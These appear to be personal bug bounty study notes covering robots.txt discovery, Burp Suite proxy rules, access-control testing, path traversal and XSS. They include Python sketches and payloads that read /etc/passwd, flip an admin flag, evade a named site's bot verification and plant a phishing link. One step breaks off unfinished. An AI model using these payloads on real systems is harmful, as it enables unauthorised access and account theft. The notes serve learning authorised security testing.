Bug Bounty Steps
- Append /robots.txt to any targeted website's URL to see the pages that are hidden
from end users
- Guess the hidden folders if the robots.txt is empty (ex: /database, /backups,
/users...) as in the sketch below
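A minimal sketch of this step in Python, assuming the requests library; the target
URL and the folder wordlist are placeholders, not from the notes:

    import requests

    TARGET = "https://example.com"  # placeholder target
    COMMON_DIRS = ["/database", "/backups", "/users", "/admin"]  # guessed names

    # First, read robots.txt to find the paths the site hides from end users
    robots = requests.get(TARGET + "/robots.txt", timeout=10)
    if robots.status_code == 200 and robots.text.strip():
        print("robots.txt contents:")
        print(robots.text)
    else:
        # robots.txt is empty or missing: fall back to guessing common folders
        for path in COMMON_DIRS:
            r = requests.get(TARGET + path, timeout=10)
            if r.status_code != 404:
                print(path, "->", r.status_code)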
- Use the Burp Suite tool to manipulate our requests using its proxy feature
- When using Burp Suite, some strong websites like Udemy might detect that we
are connecting to the website through Burp Suite, and require confirmation that we're
not a bot (click to verify that you're human)
To avoid this problem, we enable the "Emulate Android" feature, or emulate
IE/iOS,
from the "Proxy" window, then the "Options" sub-window, then the "Match and Replace"
section
this way, the Udemy website will see us as an Android device, and skip its
verification method (see the sketch below)
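Under the hood, that Match and Replace rule rewrites the User-Agent request header;
a rough Python illustration of the same idea (the Android User-Agent string below is
just an example, not from the notes):

    import requests

    # An Android browser User-Agent, standing in for Burp's "Emulate Android" rule
    ANDROID_UA = ("Mozilla/5.0 (Linux; Android 13; Pixel 7) "
                  "AppleWebKit/537.36 (KHTML, like Gecko) "
                  "Chrome/114.0.0.0 Mobile Safari/537.36")

    r = requests.get("https://www.udemy.com", headers={"User-Agent": ANDROID_UA})
    print(r.status_code)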
* Broken Access Control:
Basically it means that a user can reach or alter information that he does not
have access to
It's always a good approach to use 2 accounts when searching for this bug in a website:
an account that you create as a test victim, to try to reach its information,
and an account that you use as the bug bounty hunter (see the sketch below)
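A sketch of the two-account check in Python; the endpoint, the object ID, and the
session token are invented for illustration:

    import requests

    # Hypothetical endpoint holding the test victim account's data
    VICTIM_PROFILE = "https://example.com/api/users/1001"
    # Logged in as the hunter account, not the victim
    HUNTER_COOKIE = {"session": "hunter-session-token"}

    # If the hunter's session can read the victim's data,
    # access control is broken
    r = requests.get(VICTIM_PROFILE, cookies=HUNTER_COOKIE)
    print(r.status_code, r.text[:200])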
- We can add "match rules" in the "Options" window of the "Proxy" page of Burp Suite
for example: add a rule to match "admin=false" and replace it with
"admin=true"
this will let us log in as admin, if the admin account exists and is enabled on the
website (see the sketch below)
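The same flip done outside Burp, sketched in Python; the login URL and the parameter
names are assumptions for illustration:

    import requests

    # Hypothetical login form fields; the point is flipping the admin flag
    # before the request reaches the server, as the match/replace rule does
    data = {"username": "user", "password": "pass", "admin": "false"}
    data["admin"] = "true"  # match "admin=false" -> replace with "admin=true"

    r = requests.post("https://example.com/login", data=data)
    print(r.status_code)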
- If we reached a page that shows the passwords of other accounts, but they are
masked as stars (******),
we can view them as plain characters using this method:
* Path Traversal:
It allows the hunter to reach the directories and folders on the web server
- It's mostly about manipulating the GET requests using Burp Suite, trying
to reach an important directory like (/) or (/etc)...
- Sometimes, the developer may only allow a specific type of file to be accessed
through the GET request (ex: only jpg files)
To bypass this, we can append the jpg extension to our target file after a null
byte, like below:
../../../etc/passwd%00.jpg
Or, if the GET request is sent using the full path (ex:
/var/www/images/image23.jpg)
and we get an error when changing it to our target path (ex: /etc/passwd),
then we can keep the default path, and traverse back from it to our target path (ex:
/var/www/images/../../../etc/passwd) as in the sketch below
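A small sketch of trying these payloads, assuming a vulnerable "filename" parameter
on an example endpoint (both are placeholders):

    import requests

    BASE = "https://example.com/loadImage"  # hypothetical endpoint
    PAYLOADS = [
        "../../../etc/passwd",                  # plain traversal
        "../../../etc/passwd%00.jpg",           # null byte, then the allowed extension
        "/var/www/images/../../../etc/passwd",  # keep the expected base path, step back out
    ]

    for p in PAYLOADS:
        # Build the URL by hand so the payload characters are sent as-is
        r = requests.get(BASE + "?filename=" + p)
        if "root:" in r.text:  # lines of /etc/passwd start with names like root:
            print("traversal worked with:", p)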
- Sometimes, the developer filters all the (/) characters in the GET request, and to
bypass this, we can try to encode the (/) in Burp Suite:
we start by selecting the "/" in our GET request, then right-click and choose
"Convert selection", select "URL", and then "URL-encode all characters"
this will turn our "/" into "%2f", which will not be filtered, and will be decoded
by the website back to "/"
Or, the developer might even filter our encoded "/" ("%2f"), so we use
"%252f", which is the "/" URL-encoded twice:
the filter's first decode turns it into "%2f" without matching, and the second decode
turns it back into "/"
and our target path will be, for example: ..%252f..%252f..%252fetc%252fpasswd
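The encodings themselves, sketched with the Python standard library:

    from urllib.parse import quote

    slash = "/"
    once = quote(slash, safe="")   # '%2F' (single URL encoding)
    twice = quote(once, safe="")   # '%252F' (double URL encoding)

    print(once, twice)
    print("..%252f..%252f..%252fetc%252fpasswd")  # the payload from the notes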
- We can use the "Intruder" window in Burp Suite to try the payloads we want
automatically against the target website, instead of
wasting our time testing them manually one by one (see the sketch below)
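What Intruder automates, sketched as a plain Python loop; the wordlist path and the
endpoint are assumptions:

    import requests

    # Payloads read from a wordlist file (the path is a placeholder)
    with open("traversal_payloads.txt") as f:
        payloads = [line.strip() for line in f if line.strip()]

    for p in payloads:
        r = requests.get("https://example.com/loadImage?filename=" + p)
        # Responses whose status or length stands out are worth a manual look
        print(r.status_code, len(r.content), p)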
* XSS (Cross-Site Scripting):
It lets the attacker inject JavaScript code (or HTML) inside the page (client
side)
and it has three types (Reflected XSS, Stored XSS, DOM-Based XSS)
the difference between them is how the attacker delivers his code to the web page
- HTML injection is less dangerous than JavaScript injection, but it's also simpler
So, we can start with it to check whether there's a JavaScript injection vulnerability
or not
the easiest way to start is to look for an input field (ex: a search bar) and start
entering simple HTML code inside it
ex: <b>Hello</b> , if the result was the word Hello in bold, it means that the web
page is vulnerable to HTML injection (see the sketch below)
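A quick automated version of the same probe in Python; the search parameter name "q"
is an assumption:

    import requests

    probe = "<b>Hello</b>"
    r = requests.get("https://example.com/search", params={"q": probe})

    # If the tag comes back unescaped, the page renders our HTML
    if probe in r.text:
        print("likely vulnerable to HTML injection")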
- After knowing that the webpage is vulnerable to injection, we can inject more
dangerous code (HTML or JavaScript)
ex: <a href="link to a fake login page to steal the users' accounts">click here</a>
or: <script>alert("hacked");</script> which, when run, will show a pop-up
saying "hacked"